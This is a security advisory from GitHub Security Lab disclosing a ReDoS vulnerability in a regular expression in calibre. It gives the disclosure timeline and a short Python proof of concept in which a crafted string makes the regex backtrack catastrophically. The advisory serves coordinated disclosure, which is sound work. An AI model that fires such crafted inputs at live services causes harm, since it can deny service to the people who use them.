Coordinated Disclosure Timeline
- 2021-08-31: report sent to kovid@kovidgoyal.net
- 2021-08-31: Issue is fixed by @kovidgoyal.
- 2021-08-31: Emailed kovid@kovidgoyal.net to ask if there will a new release of calibre and whether there will be an advisory.
- 2021-09-01: Reply from kovid@kovidgoyal.net: “calibre is released every two weeks, the next release will be on the 10th. And no I am not going to release my own advisory, it’s a DoS, there are rather a lot”
Summary
calibre contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
calibre
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the results of the query on calibre by following this link.
Vulnerability
The vulnerable regular expression is here.
To see that the regular expression is vulnerable, copy-paste it into a separate file as shown below:
- Run the code below with
python3:
import re
reg = r'(?mu)\!\[([^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*)\]\s*\((?P<path>[^\)]*)\)';
txt = "u![[[[[[Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z]()"
for x in re.finditer(reg, txt):
print(x.group('path'))
Impact
This issue may lead to a denial of service.
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-112 in any communication regarding this issue.